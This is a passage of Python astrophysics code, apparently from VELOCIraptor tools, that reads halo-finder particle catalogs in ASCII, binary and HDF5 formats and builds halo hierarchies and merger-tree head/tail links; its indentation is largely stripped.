particledata['Npart_unbound']=np.zeros(numtothalos,dtype=np.uint64)
particledata['Particle_IDs']=[[] for i in range(numtothalos)]
if (iparttypes==1):
particledata['Particle_Types']=[[] for i in range(numtothalos)]
#now for all files
counter=np.uint64(0)
subfilenames=[""]
if (iseparatesubfiles==1): subfilenames=["",".sublevels"]
for ifile in range(numfiles):
for subname in subfilenames:
bfname=basefilename+subname
gfilename=bfname+".catalog_groups"
pfilename=bfname+".catalog_particles"
upfilename=pfilename+".unbound"
tfilename=bfname+".catalog_parttypes"
utfilename=tfilename+".unbound"
if (inompi==False):
gfilename+="."+str(ifile)
pfilename+="."+str(ifile)
upfilename+="."+str(ifile)
tfilename+="."+str(ifile)
utfilename+="."+str(ifile)
if (iverbose) : print("reading",bfname,ifile)
#ascii
if (ibinary==0):
gfile = open(gfilename, 'r')
#read header information
gfile.readline()
[numhalos,foo]= gfile.readline().split()
numhalos=np.uint64(numhalos)
gfile.close()
#load data
gdata=np.loadtxt(gfilename,skiprows=2,dtype=np.uint64)
numingroup=gdata[:numhalos]
offset=gdata[int(numhalos):int(2*numhalos)]
uoffset=gdata[int(2*numhalos):int(3*numhalos)]
#particle id data
pfile=open(pfilename, 'r')
pfile.readline()
[npart,foo]= pfile.readline().split()
npart=np.uint64(npart)
pfile.close()
piddata=np.loadtxt(pfilename,skiprows=2,dtype=np.int64)
upfile= open(upfilename, 'r')
upfile.readline()
[unpart,foo]= upfile.readline().split()
unpart=np.uint64(unpart)
upfile.close()
upiddata=np.loadtxt(upfilename,skiprows=2,dtype=np.int64)
if (iparttypes==1):
#particle id data
tfile= open(tfilename, 'r')
tfile.readline()
[npart,foo]= tfile.readline().split()
tfile.close()
tdata=np.loadtxt(tfilename,skiprows=2,dtype=np.uint16)
utfile= open(utfilename, 'r')
utfile.readline()
[unpart,foo]= utfile.readline().split()
utfile.close()
utdata=np.loadtxt(utfilename,skiprows=2,dtype=np.uint16)
#binary
elif (ibinary==1):
gfile = open(gfilename, 'rb')
np.fromfile(gfile,dtype=np.int32,count=2)
[numhalos,foo]=np.fromfile(gfile,dtype=np.uint64,count=2)
#need to generalise to
numingroup=np.fromfile(gfile,dtype=binarydtype ,count=numhalos)
offset=np.fromfile(gfile,dtype=binarydtype,count=numhalos)
uoffset=np.fromfile(gfile,dtype=binarydtype,count=numhalos)
gfile.close()
pfile = open(pfilename, 'rb')
np.fromfile(pfile,dtype=np.int32,count=2)
[npart,foo]=np.fromfile(pfile,dtype=np.uint64,count=2)
piddata=np.fromfile(pfile,dtype=binarydtype ,count=npart)
pfile.close()
upfile = open(upfilename, 'rb')
np.fromfile(upfile,dtype=np.int32,count=2)
[unpart,foo]=np.fromfile(upfile,dtype=np.uint64,count=2)
upiddata=np.fromfile(upfile,dtype=binarydtype ,count=unpart)
upfile.close()
if (iparttypes==1):
tfile = open(tfilename, 'rb')
np.fromfile(tfile,dtype=np.int32,count=2)
[npart,foo]=np.fromfile(tfile,dtype=np.uint16,count=2)
tdata=np.fromfile(tfile,dtype=binarydtype ,count=npart)
tfile.close()
utfile = open(utfilename, 'rb')
np.fromfile(utfile,dtype=np.int32,count=2)
[unpart,foo]=np.fromfile(utfile,dtype=np.uint16,count=2)
utdata=np.fromfile(utfile,dtype=binarydtype ,count=unpart)
utfile.close()
#hdf
elif (ibinary==2):
gfile = h5py.File(gfilename, 'r')
numhalos=np.uint64(gfile["Num_of_groups"][0])
numingroup=np.uint64(gfile["Group_Size"])
offset=np.uint64(gfile["Offset"])
uoffset=np.uint64(gfile["Offset_unbound"])
gfile.close()
pfile = h5py.File(pfilename, 'r')
upfile = h5py.File(upfilename, 'r')
piddata=np.int64(pfile["Particle_IDs"])
upiddata=np.int64(upfile["Particle_IDs"])
npart=len(piddata)
unpart=len(upiddata)
pfile.close()
upfile.close()
if (iparttypes==1):
tfile = h5py.File(tfilename, 'r')
utfile = h5py.File(utfilename, 'r')
                    tdata=np.uint16(tfile["Particle_Types"])
                    utdata=np.uint16(utfile["Particle_Types"])
tfile.close()
utfile.close()
#now with data loaded, process it to produce data structure
particledata['Npart'][counter:counter+numhalos]=numingroup
unumingroup=np.zeros(numhalos,dtype=np.uint64)
for i in range(int(numhalos-1)):
unumingroup[i]=(uoffset[i+1]-uoffset[i]);
unumingroup[-1]=(unpart-uoffset[-1])
particledata['Npart_unbound'][counter:counter+numhalos]=unumingroup
for i in range(numhalos):
particledata['Particle_IDs'][int(i+counter)]=np.zeros(numingroup[i],dtype=np.int64)
particledata['Particle_IDs'][int(i+counter)][:int(numingroup[i]-unumingroup[i])]=piddata[offset[i]:offset[i]+numingroup[i]-unumingroup[i]]
particledata['Particle_IDs'][int(i+counter)][int(numingroup[i]-unumingroup[i]):numingroup[i]]=upiddata[uoffset[i]:uoffset[i]+unumingroup[i]]
if (iparttypes==1):
particledata['Particle_Types'][int(i+counter)]=np.zeros(numingroup[i],dtype=np.int64)
particledata['Particle_Types'][int(i+counter)][:int(numingroup[i]-unumingroup[i])]=tdata[offset[i]:offset[i]+numingroup[i]-unumingroup[i]]
particledata['Particle_Types'][int(i+counter)][int(numingroup[i]-unumingroup[i]):numingroup[i]]=utdata[uoffset[i]:uoffset[i]+unumingroup[i]]
counter+=numhalos
return particledata
def ReadSOParticleDataFile(basefilename,ibinary=0,iverbose=0,binarydtype=np.int64):
"""
    Reads a VELOCIraptor/STF .catalog_SOlist file (SO region particle lists) in various formats
Note that a file will indicate how many files the total output has been split into
"""
inompi=True
if (iverbose): print("reading particle data",basefilename)
filename=basefilename+".catalog_SOlist"
#check for file existence
if (os.path.isfile(filename)==True):
numfiles=0
else:
filename+=".0"
inompi=False
if (os.path.isfile(filename)==False):
print("file not found",filename)
return []
byteoffset=0
#load header information from file to get total number of groups
#ascii
if (ibinary==0):
gfile = open(filename, 'r')
[filenum,numfiles]=gfile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
[numSO, numtotSO]= gfile.readline().split()
[numparts, numtotparts]= gfile.readline().split()
        numSO=np.uint64(numSO);numtotSO=np.uint64(numtotSO)
numparts=np.uint64(numparts);numtotparts=np.uint64(numtotparts)
#binary
elif (ibinary==1):
gfile = open(filename, 'rb')
[filenum,numfiles]=np.fromfile(gfile,dtype=np.int32,count=2)
[numSO,numtotSO]=np.fromfile(gfile,dtype=np.uint64,count=2)
[numparts,numtotparts]=np.fromfile(gfile,dtype=np.uint64,count=2)
#hdf
elif (ibinary==2):
gfile = h5py.File(filename, 'r')
filenum=int(gfile["File_id"][0])
numfiles=int(gfile["Num_of_files"][0])
numSO=np.uint64(gfile["Num_of_SO_regions"][0])
numtotSO=np.uint64(gfile["Total_num_of_SO_regions"][0])
numparts=np.uint64(gfile["Num_of_particles_in_SO_regions"][0])
numtotparts=np.uint64(gfile["Total_num_of_particles_in_SO_regions"][0])
gfile.close()
particledata=dict()
particledata['Npart']=[]
particledata['Particle_IDs']=[]
if (iverbose):
        print("SO list contains ",numtotSO," regions containing a total of ",numtotparts," particles in ",numfiles," files")
if (numtotSO==0):
return particledata
particledata['Npart']=np.zeros(numtotSO,dtype=np.uint64)
particledata['Particle_IDs']=[[] for i in range(numtotSO)]
#now for all files
counter=np.uint64(0)
for ifile in range(numfiles):
filename=basefilename+".catalog_SOlist"
if (inompi==False):
filename+="."+str(ifile)
#ascii
if (ibinary==0):
gfile = open(filename, 'r')
#read header information
gfile.readline()
[numSO,foo]= gfile.readline().split()
[numparts,foo]= gfile.readline().split()
numSO=np.uint64(numSO)
            numparts=np.uint64(numparts)
gfile.close()
#load data
            gdata=np.loadtxt(filename,skiprows=2,dtype=np.uint64)
numingroup=gdata[:numSO]
offset=gdata[np.int64(numSO):np.int64(2*numSO)]
piddata=gdata[np.int64(2*numSO):np.int64(2*numSO+numparts)]
#binary
elif (ibinary==1):
gfile = open(filename, 'rb')
np.fromfile(gfile,dtype=np.int32,count=2)
[numSO,foo]=np.fromfile(gfile,dtype=np.uint64,count=2)
[numparts,foo]=np.fromfile(gfile,dtype=np.uint64,count=2)
numingroup=np.fromfile(gfile,dtype=binarydtype ,count=numSO)
offset=np.fromfile(gfile,dtype=binarydtype,count=numSO)
piddata=np.fromfile(gfile,dtype=binarydtype ,count=numparts)
gfile.close()
#hdf
elif (ibinary==2):
gfile = h5py.File(filename, 'r')
numSO=np.uint64(gfile["Num_of_SO_regions"][0])
numingroup=np.uint64(gfile["SO_size"])
offset=np.uint64(gfile["Offset"])
piddata=np.int64(gfile["Particle_IDs"])
gfile.close()
#now with data loaded, process it to produce data structure
particledata['Npart'][counter:counter+numSO]=numingroup
for i in range(numSO):
particledata['Particle_IDs'][int(i+counter)]=np.array(piddata[offset[i]:offset[i]+numingroup[i]])
counter+=numSO
return particledata
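#Hedged usage sketch (not part of the original file): the base file name "snapshot_100" and the
#choice of HDF input (ibinary=2) below are assumptions purely for illustration.
def _example_read_so_particles():
    """Illustrative wrapper showing how ReadSOParticleDataFile might be called."""
    sodata = ReadSOParticleDataFile("snapshot_100", ibinary=2, iverbose=1)
    #an empty list or empty 'Npart' entry means nothing was read
    if (len(sodata) == 0 or len(sodata['Npart']) == 0):
        return
    #particle IDs belonging to the first SO region
    print("first SO region has", sodata['Npart'][0], "particles, e.g.", sodata['Particle_IDs'][0][:5])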
"""
Routines to build a hierarchy structure (both spatially and temporally)
"""
def BuildHierarchy(halodata,iverbose=0):
"""
the halo data stored in a velociraptor .properties file should store the id of its parent halo. Here
this catalog is used to produce a hierarchy to quickly access the relevant subhaloes of a parent halo.
#todo this should be deprecated as Hierarchy information is typically already contained in halo information
"""
halohierarchy=[]
start=time.clock()
if (iverbose): print("setting hierarchy")
numhalos=len(halodata["npart"])
subhaloindex=np.where(halodata["hostHaloID"]!=-1)
lensub=len(subhaloindex[0])
haloindex=np.where(halodata["hostHaloID"]==-1)
lenhal=len(haloindex[0])
halohierarchy=[[] for k in range(numhalos)]
if (iverbose): print("prelims done ",time.clock()-start)
for k in range(lenhal):
halohierarchy[haloindex[0][k]]=np.where(halodata["hostHaloID"]==halodata["ID"][haloindex[0][k]])
#NOTE: IMPORTANT this is only adding the subsub halos! I need to eventually parse the hierarchy
    #data first to determine the depth of the subhalo hierarchy and store how deep an object is in the hierarchy
#then I can begin adding (sub)subhalos to parent subhalos from the bottom level up
"""
for k in range(0,len(halodata["npart"])):
hid=np.int32(halodata["hostHaloID"][k])
if (hid>-1 and halohierarchy[k]!=[]):
halohierarchy[hid]=np.append(np.int32(halohierarchy[hid]),halohierarchy[k])
"""
if (iverbose): print("hierarchy set in read in ",time.clock()-start)
return halohierarchy
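#Hedged usage sketch (not part of the original code): given a single-snapshot halo catalog
#dictionary, BuildHierarchy returns, per host halo, the indices of its direct subhaloes.
def _example_build_hierarchy(halodata_snap):
    """Illustrative: print the subhalo indices of the first field halo in a catalog."""
    hierarchy = BuildHierarchy(halodata_snap, iverbose=0)
    hostindices = np.where(halodata_snap["hostHaloID"] == -1)[0]
    if (len(hostindices) > 0):
        ihost = hostindices[0]
        print("host", halodata_snap["ID"][ihost], "has subhalo indices", hierarchy[ihost])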
def TraceMainProgen(istart,ihalo,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL):
"""
Follows a halo along tree to identify main progenitor
"""
#start at this snapshot
k=istart
    #see if halo does not have its tail (main progenitor) set.
if (halodata[k]['Tail'][ihalo]==0):
#if halo has not had a tail set the branch needs to be walked along the main branch
haloid=halodata[k]['ID'][ihalo]
#only set the head if it has not been set
#otherwise it should have already been set and just need to store the root head
if (halodata[k]['Head'][ihalo]==0):
halodata[k]['Head'][ihalo]=haloid
halodata[k]['HeadSnap'][ihalo]=k
halodata[k]['RootHead'][ihalo]=haloid
halodata[k]['RootHeadSnap'][ihalo]=k
roothead,rootsnap,rootindex=haloid,k,ihalo
else:
roothead=halodata[k]['RootHead'][ihalo]
rootsnap=halodata[k]['RootHeadSnap'][ihalo]
rootindex=int(roothead%TEMPORALHALOIDVAL)-1
#now move along tree first pass to store head and tails and root heads of main branch
while (True):
            #instead of searching array make use of the value of the id as it should be in id order
#wdata=np.where(tree[k]['haloID']==haloid)
#w2data=np.where(halodata[k]['ID']==haloid)[0][0]
wdata=w2data=int(haloid%TEMPORALHALOIDVAL)-1
halodata[k]['Num_progen'][wdata]=tree[k]['Num_progen'][wdata]
#if no more progenitors, break from search
#if (tree[k]['Num_progen'][wdata[0][0]]==0 or len(wdata[0])==0):
if (tree[k]['Num_progen'][wdata]==0):
#store for current halo its tail and root tail info (also store root tail for root head)
halodata[k]['Tail'][w2data]=haloid
halodata[k]['TailSnap'][w2data]=k
halodata[k]['RootTail'][w2data]=haloid
halodata[k]['RootTailSnap'][w2data]=k
#only set the roots tail if it has not been set before (ie: along the main branch of root halo)
#if it has been set then we are walking along a secondary branch of the root halo's tree
if (halodata[rootsnap]['RootTail'][rootindex]==0):
halodata[rootsnap]['RootTail'][rootindex]=haloid
halodata[rootsnap]['RootTailSnap'][rootindex]=k
break
#store main progenitor
#mainprog=tree[k]['Progen'][wdata[0][0]][0]
mainprog=tree[k]['Progen'][wdata][0]
#calculate stepsize based on the halo ids
stepsize=int(((haloid-haloid%TEMPORALHALOIDVAL)-(mainprog-mainprog%TEMPORALHALOIDVAL))/TEMPORALHALOIDVAL)
#store tail
halodata[k]['Tail'][w2data]=mainprog
halodata[k]['TailSnap'][w2data]=k+stepsize
k+=stepsize
#instead of searching array make use of the value of the id as it should be in id order
#for progid in tree[k-stepsize]['Progen'][wdata[0][0]]:
# wdata3=np.where(halodata[k]['ID']==progid)[0][0]
for progid in tree[k-stepsize]['Progen'][wdata]:
wdata3=int(progid%TEMPORALHALOIDVAL)-1
halodata[k]['Head'][wdata3]=haloid
halodata[k]['HeadSnap'][wdata3]=k-stepsize
halodata[k]['RootHead'][wdata3]=roothead
halodata[k]['RootHeadSnap'][wdata3]=rootsnap
#then store next progenitor
haloid=mainprog
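#Sketch of the halo ID convention these tree-walking routines rely on (the helper name is
#hypothetical, not part of the original API): IDs are made temporally unique by adding
#snapnum*TEMPORALHALOIDVAL, so snapshot and array index can be recovered arithmetically.
def _decompose_temporal_haloid(haloid, TEMPORALHALOIDVAL=1000000000000):
    """Return the (snapshot, index) pair encoded in a temporally unique halo ID."""
    halosnap = int(haloid / TEMPORALHALOIDVAL)
    haloindex = int(haloid % TEMPORALHALOIDVAL) - 1
    return halosnap, haloindex
#e.g. ID 2000000000005 -> snapshot 2, index 4; note that catalogs stored with late times first
#use numsnaps-1-halosnap as the list index (see the ireverseorder handling further down).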
def TraceMainProgenParallelChunk(istart,ihalochunk,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL):
"""
Wrapper to allow for parallelisation
"""
for ihalo in ihalochunk:
TraceMainProgen(istart,ihalo,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL)
def BuildTemporalHeadTail(numsnaps,tree,numhalos,halodata,TEMPORALHALOIDVAL=1000000000000, iverbose=1):
"""
Adds for each halo its Head and Tail and stores Roothead and RootTail to the halo
properties file
TEMPORALHALOIDVAL is used to parse the halo ids and determine the step size between descendant and progenitor
"""
print("Building Temporal catalog with head and tails")
for k in range(numsnaps):
halodata[k]['Head']=np.zeros(numhalos[k],dtype=np.int64)
halodata[k]['Tail']=np.zeros(numhalos[k],dtype=np.int64)
halodata[k]['HeadSnap']=np.zeros(numhalos[k],dtype=np.int32)
halodata[k]['TailSnap']=np.zeros(numhalos[k],dtype=np.int32)
halodata[k]['RootHead']=np.zeros(numhalos[k],dtype=np.int64)
halodata[k]['RootTail']=np.zeros(numhalos[k],dtype=np.int64)
halodata[k]['RootHeadSnap']=np.zeros(numhalos[k],dtype=np.int32)
halodata[k]['RootTailSnap']=np.zeros(numhalos[k],dtype=np.int32)
halodata[k]['Num_progen']=np.zeros(numhalos[k],dtype=np.uint32)
#for each snapshot identify halos that have not had their tail set
#for these halos, the main branch must be walked
#allocate python manager to wrapper the tree and halo catalog so they can be altered in parallel
manager=mp.Manager()
chunksize=5000000 #have each thread handle this many halos at once
    #initially assume that snapshots at this point should be run in parallel
if (numhalos[0]>2*chunksize): iparallel=1
else: iparallel=-1 #no parallel at all
iparallel=-1
totstart=time.clock()
if (iparallel==1):
#need to copy halodata as this will be altered
if (iverbose>0): print("copying halo")
start=time.clock()
mphalodata=manager.list([manager.dict(halodata[k]) for k in range(numsnaps)])
if (iverbose>0): print("done",time.clock()-start)
for istart in range(numsnaps):
if (iverbose>0): print("Starting from halos at ",istart,"with",numhalos[istart])
if (numhalos[istart]==0): continue
#if the number of halos is large then run in parallel
if (numhalos[istart]>2*chunksize and iparallel==1):
#determine maximum number of threads
nthreads=int(min(mp.cpu_count(),ceil(numhalos[istart]/float(chunksize))))
nchunks=int(np.ceil(numhalos[istart]/float(chunksize)/float(nthreads)))
if (iverbose>0): print("Using", nthreads,"threads to parse ",numhalos[istart]," halos in ",nchunks,"chunks, each of size", chunksize)
            #now for each chunk run a set of processes
for j in range(nchunks):
start=time.clock()
offset=j*nthreads*chunksize
#if last chunk then must adjust nthreads
if (j==nchunks-1):
nthreads=int(ceil((numhalos[istart]-offset)/float(chunksize)))
halochunk=[range(offset+k*chunksize,offset+(k+1)*chunksize) for k in range(nthreads)]
#adjust last chunk
if (j==nchunks-1):
halochunk[-1]=range(offset+(nthreads-1)*chunksize,numhalos[istart])
#when calling a process pass not just a work queue but the pointers to where data should be stored
processes=[mp.Process(target=TraceMainProgenParallelChunk,args=(istart,halochunk[k],numsnaps,numhalos,mphalodata,tree,TEMPORALHALOIDVAL)) for k in range(nthreads)]
count=0
for p in processes:
print(count+offset,k,min(halochunk[count]),max(halochunk[count]))
p.start()
count+=1
for p in processes:
#join thread and see if still active
p.join()
if (iverbose>1): print((offset+j*nthreads*chunksize)/float(numhalos[istart])," done in",time.clock()-start)
#otherwise just single
else :
#if first time entering non parallel section copy data back from parallel manager based structure to original data structure
#as parallel structures have been updated
if (iparallel==1):
#tree=[dict(mptree[k]) for k in range(numsnaps)]
halodata=[dict(mphalodata[k]) for k in range(numsnaps)]
                #set the iparallel flag to 0 so that all subsequent snapshots (which should have fewer objects) are not run in parallel
                #this is principally to minimize the amount of copying between manager based parallel structures and the halo/tree catalogs
iparallel=0
start=time.clock()
chunksize=max(int(0.10*numhalos[istart]),10)
for j in range(numhalos[istart]):
#start at this snapshot
#start=time.clock()
TraceMainProgen(istart,j,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL)
if (j%chunksize==0 and j>0):
if (iverbose>1): print("done", j/float(numhalos[istart]), "in", time.clock()-start)
start=time.clock()
if (iverbose>0): print("done with first bit")
#now have walked all the main branches and set the root head, head and tail values
#and can set the root tail of all halos. Start at end of the tree and move in reverse setting the root tail
#of a halo's head so long as that halo's tail is the current halo (main branch)
for istart in range(numsnaps-1,-1,-1):
for j in range(numhalos[istart]):
            #if a halo's root tail is itself then start moving along to its head (if its head is not itself as well)
k=istart
#rootheadid,rootheadsnap=halodata[k]['RootHead'][j],halodata[k]['RootHeadSnap'][j]
roottailid,roottailsnap=halodata[k]['RootTail'][j],halodata[k]['RootTailSnap'][j]
headid,headsnap=halodata[k]['Head'][j],halodata[k]['HeadSnap'][j]
if (roottailid==halodata[k]['ID'][j] and headid!=halodata[k]['ID'][j]):
#headindex=np.where(halodata[headsnap]['ID']==headid)[0][0]
headindex=int(headid%TEMPORALHALOIDVAL)-1
headtailid,headtailsnap=halodata[headsnap]['Tail'][headindex],halodata[headsnap]['TailSnap'][headindex]
haloid=halodata[k]['ID'][j]
            #only proceed in setting root tails of a head whose tail is the same as this halo (main branch) till we reach a halo that is its own head
while (headtailid==haloid and headid!=haloid):
#set root tails
halodata[headsnap]['RootTail'][headindex]=roottailid
halodata[headsnap]['RootTailSnap'][headindex]=roottailsnap
#move to next head
haloid=halodata[headsnap]['ID'][headindex]
#haloindex=np.where(halodata[headsnap]['ID']==haloid)[0][0]
haloindex=int(haloid%TEMPORALHALOIDVAL)-1
halosnap=headsnap
headid,headsnap=halodata[halosnap]['Head'][haloindex],halodata[halosnap]['HeadSnap'][haloindex]
headindex=int(headid%TEMPORALHALOIDVAL)-1
#store the tail of the next head
headtailid,headtailsnap=halodata[headsnap]['Tail'][headindex],halodata[headsnap]['TailSnap'][headindex]
print("Done building", time.clock()-totstart)
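#Hedged usage sketch (not from the original file): once BuildTemporalHeadTail has populated
#Tail/TailSnap, the main branch of any halo can be walked backwards in time; the loop stops
#when a halo is its own tail (the root tail of the branch).
def _example_walk_main_branch(halodata, haloid, halosnap, TEMPORALHALOIDVAL=1000000000000):
    """Illustrative: collect the IDs along a halo's main branch, moving back in time."""
    branch = [haloid]
    haloindex = int(haloid % TEMPORALHALOIDVAL) - 1
    while (True):
        tailid = halodata[halosnap]['Tail'][haloindex]
        tailsnap = halodata[halosnap]['TailSnap'][haloindex]
        if (tailid == haloid):
            break
        branch.append(tailid)
        haloid, halosnap = tailid, tailsnap
        haloindex = int(haloid % TEMPORALHALOIDVAL) - 1
    return branch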
def TraceMainDescendant(istart,ihalo,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL,ireverseorder=False):
"""
Follows a halo along descendant tree to root tails
    if reverse order then late times start at 0 and as one moves up in index
one moves backwards in time
"""
#start at this snapshot
halosnap=istart
#see if halo does not have a Head set
if (halodata[halosnap]['Head'][ihalo]==0):
#if halo has not had a Head set the branch needs to be walked along the main branch
haloid=halodata[halosnap]['ID'][ihalo]
#only set the Root Tail if it has not been set. Here if halo has not had
        #tail set, then it must be the first progenitor
#otherwise it should have already been set and just need to store the root tail
if (halodata[halosnap]['Tail'][ihalo]==0):
halodata[halosnap]['Tail'][ihalo]=haloid
halodata[halosnap]['TailSnap'][ihalo]=halosnap
halodata[halosnap]['RootTail'][ihalo]=haloid
halodata[halosnap]['RootTailSnap'][ihalo]=halosnap
roottail,rootsnap,rootindex=haloid,halosnap,ihalo
else:
roottail=halodata[halosnap]['RootTail'][ihalo]
rootsnap=halodata[halosnap]['RootTailSnap'][ihalo]
rootindex=int(roottail%TEMPORALHALOIDVAL)-1
#now move along tree first pass to store head and tails and root tails of main branch
while (True):
#ids contain index information
haloindex=int(haloid%TEMPORALHALOIDVAL)-1
halodata[halosnap]['Num_descen'][haloindex]=tree[halosnap]['Num_descen'][haloindex]
#if no more descendants, break from search
if (halodata[halosnap]['Num_descen'][haloindex]==0):
#store for current halo its tail and root tail info (also store root tail for root head)
halodata[halosnap]['Head'][haloindex]=haloid
halodata[halosnap]['HeadSnap'][haloindex]=halosnap
halodata[halosnap]['RootHead'][haloindex]=haloid
halodata[halosnap]['RootHeadSnap'][haloindex]=halosnap
rootheadid,rootheadsnap,rootheadindex=haloid,halosnap,haloindex
#only set the roots head of the root tail
#if it has not been set before (ie: along the main branch of root halo)
if (halodata[rootsnap]['RootHead'][rootindex]==0):
halosnap,haloindex,haloid=rootsnap,rootindex,roottail
#set the root head of the main branch
while(True):
halodata[halosnap]['RootHead'][haloindex]=rootheadid
halodata[halosnap]['RootHeadSnap'][haloindex]=rootheadsnap
descen=halodata[halosnap]['Head'][haloindex]
descenindex=int(descen%TEMPORALHALOIDVAL)-1
descensnap=int(((descen-descen%TEMPORALHALOIDVAL))/TEMPORALHALOIDVAL)
if (ireverseorder):
descensnap=numsnaps-1-descensnap
if (haloid==descen):
break
halosnap,haloindex,haloid=descensnap,descenindex,descen
break
            #now store the rank of the descendant.
descenrank=tree[halosnap]['Rank'][haloindex][0]
halodata[halosnap]['HeadRank'][haloindex]=descenrank
            #as we are only moving along main branches, stop if the object's rank is not 0
if (descenrank>0):
break
#otherwise, get the descendant
#store main progenitor
maindescen=tree[halosnap]['Descen'][haloindex][0]
maindescenindex=int(maindescen%TEMPORALHALOIDVAL)-1
maindescensnap=int(((maindescen-maindescen%TEMPORALHALOIDVAL))/TEMPORALHALOIDVAL)
#if reverse order, then higher snap values correspond to lower index
if (ireverseorder):
maindescensnap=numsnaps-1-maindescensnap
#calculate stepsize in time based on the halo ids
stepsize=maindescensnap-halosnap
#store descendant
halodata[halosnap]['Head'][haloindex]=maindescen
halodata[halosnap]['HeadSnap'][haloindex]=maindescensnap
#and update the root tails of the object
halodata[maindescensnap]['Tail'][maindescenindex]=haloid
halodata[maindescensnap]['TailSnap'][maindescenindex]=halosnap
halodata[maindescensnap]['RootTail'][maindescenindex]=roottail
halodata[maindescensnap]['RootTailSnap'][maindescenindex]=rootsnap
halodata[maindescensnap]['Num_progen'][maindescenindex]+=1
#then move to the next descendant
haloid=maindescen
halosnap=maindescensnap
def TraceMainDescendantParallelChunk(istart,ihalochunk,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL,ireverseorder):
for ihalo in ihalochunk:
TraceMainDescendant(istart,ihalo,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL,ireverseorder)
def BuildTemporalHeadTailDescendant(numsnaps,tree,numhalos,halodata,TEMPORALHALOIDVAL=1000000000000, ireverseorder=False, iverbose=1):
"""
Adds for each halo its Head and Tail and stores Roothead and RootTail to the halo
properties file
TEMPORALHALOIDVAL is used to parse the halo ids and determine the step size between descendant and progenitor
"""
print("Building Temporal catalog with head and tails using a descendant tree")
for k in range(numsnaps):
halodata[k]['Head']=np.zeros(numhalos[k],dtype=np.int64)
halodata[k]['Tail']=np.zeros(numhalos[k],dtype=np.int64)
halodata[k]['HeadSnap']=np.zeros(numhalos[k],dtype=np.int32)
halodata[k]['TailSnap']=np.zeros(numhalos[k],dtype=np.int32)
halodata[k]['RootHead']=np.zeros(numhalos[k],dtype=np.int64)
halodata[k]['RootTail']=np.zeros(numhalos[k],dtype=np.int64)
halodata[k]['RootHeadSnap']=np.zeros(numhalos[k],dtype=np.int32)
halodata[k]['RootTailSnap']=np.zeros(numhalos[k],dtype=np.int32)
halodata[k]['HeadRank']=np.zeros(numhalos[k],dtype=np.int64)
halodata[k]['Num_descen']=np.zeros(numhalos[k],dtype=np.uint32)
halodata[k]['Num_progen']=np.zeros(numhalos[k],dtype=np.uint32)
#for each snapshot identify halos that have not had their tail set
#for these halos, the main branch must be walked
#allocate python manager to wrapper the tree and halo catalog so they can be altered in parallel
manager=mp.Manager()
chunksize=5000000 #have each thread handle this many halos at once
    #initially assume that snapshots at this point should be run in parallel
if (numhalos[0]>2*chunksize): iparallel=1
else: iparallel=-1 #no parallel at all
iparallel=-1
totstart=time.clock()
if (ireverseorder):
snaplist=range(numsnaps-1,-1,-1)
else:
snaplist=range(numsnaps)
if (iparallel==1):
#need to copy halodata as this will be altered
if (iverbose>0): print("copying halo")
start=time.clock()
mphalodata=manager.list([manager.dict(halodata[k]) for k in range(numsnaps)])
if (iverbose>0): print("done",time.clock()-start)
for istart in snaplist:
if (iverbose>0): print("Starting from halos at ",istart,"with",numhalos[istart])
if (numhalos[istart]==0): continue
#if the number of halos is large then run in parallel
if (numhalos[istart]>2*chunksize and iparallel==1):
#determine maximum number of threads
nthreads=int(min(mp.cpu_count(),ceil(numhalos[istart]/float(chunksize))))
nchunks=int(np.ceil(numhalos[istart]/float(chunksize)/float(nthreads)))
if (iverbose>0): print("Using", nthreads,"threads to parse ",numhalos[istart]," halos in ",nchunks,"chunks, each of size", chunksize)
            #now for each chunk run a set of processes
for j in range(nchunks):
start=time.clock()
offset=j*nthreads*chunksize
#if last chunk then must adjust nthreads
if (j==nchunks-1):
nthreads=int(ceil((numhalos[istart]-offset)/float(chunksize)))
halochunk=[range(offset+k*chunksize,offset+(k+1)*chunksize) for k in range(nthreads)]
#adjust last chunk
if (j==nchunks-1):
halochunk[-1]=range(offset+(nthreads-1)*chunksize,numhalos[istart])
#when calling a process pass not just a work queue but the pointers to where data should be stored
processes=[mp.Process(target=TraceMainDescendantParallelChunk,args=(istart,halochunk[k],numsnaps,numhalos,mphalodata,tree,TEMPORALHALOIDVAL,ireverseorder)) for k in range(nthreads)]
count=0
for p in processes:
print(count+offset,k,min(halochunk[count]),max(halochunk[count]))
p.start()
count+=1
for p in processes:
#join thread and see if still active
p.join()
if (iverbose>1): print((offset+j*nthreads*chunksize)/float(numhalos[istart])," done in",time.clock()-start)
#otherwise just single
else :
#if first time entering non parallel section copy data back from parallel manager based structure to original data structure
#as parallel structures have been updated
if (iparallel==1):
#tree=[dict(mptree[k]) for k in range(numsnaps)]
halodata=[dict(mphalodata[k]) for k in range(numsnaps)]
                #set the iparallel flag to 0 so that all subsequent snapshots (which should have fewer objects) are not run in parallel
                #this is principally to minimize the amount of copying between manager based parallel structures and the halo/tree catalogs
iparallel=0
start=time.clock()
chunksize=max(int(0.10*numhalos[istart]),10)
for j in range(numhalos[istart]):
#start at this snapshot
#start=time.clock()
TraceMainDescendant(istart,j,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL,ireverseorder)
if (j%chunksize==0 and j>0):
if (iverbose>1): print("done", j/float(numhalos[istart]), "in", time.clock()-start)
start=time.clock()
if (iverbose>0): print("done with first bit, setting the main branches walking forward in time")
#now have walked all the main branches and set the root tail, head and tail values
#in case halo data is with late times at beginning need to process items in reverse
if (ireverseorder):
snaplist=range(numsnaps)
else:
snaplist=range(numsnaps-1,-1,-1)
for istart in snaplist:
#identify all haloes which are not primary progenitors of their descendants, having a descendant rank >0
wdata=np.where(halodata[istart]['HeadRank']>0)
#sort this list based on descendant ranking
sortedranking=np.argsort(halodata[istart]['HeadRank'][wdata])
nrankedhalos=len(wdata[0])
rankedhalos=halodata[istart]['ID'][wdata[0][sortedranking]]
#for each of these haloes, set the head and use the root head information and root snap and set all the information
        #along its branch
for ihalo in rankedhalos:
haloid=ihalo
haloindex=int(haloid%TEMPORALHALOIDVAL)-1
halosnap=istart
#now set the head of these objects
maindescen=tree[halosnap]['Descen'][haloindex][0]
maindescenindex=int(maindescen%TEMPORALHALOIDVAL)-1
if (ireverseorder):
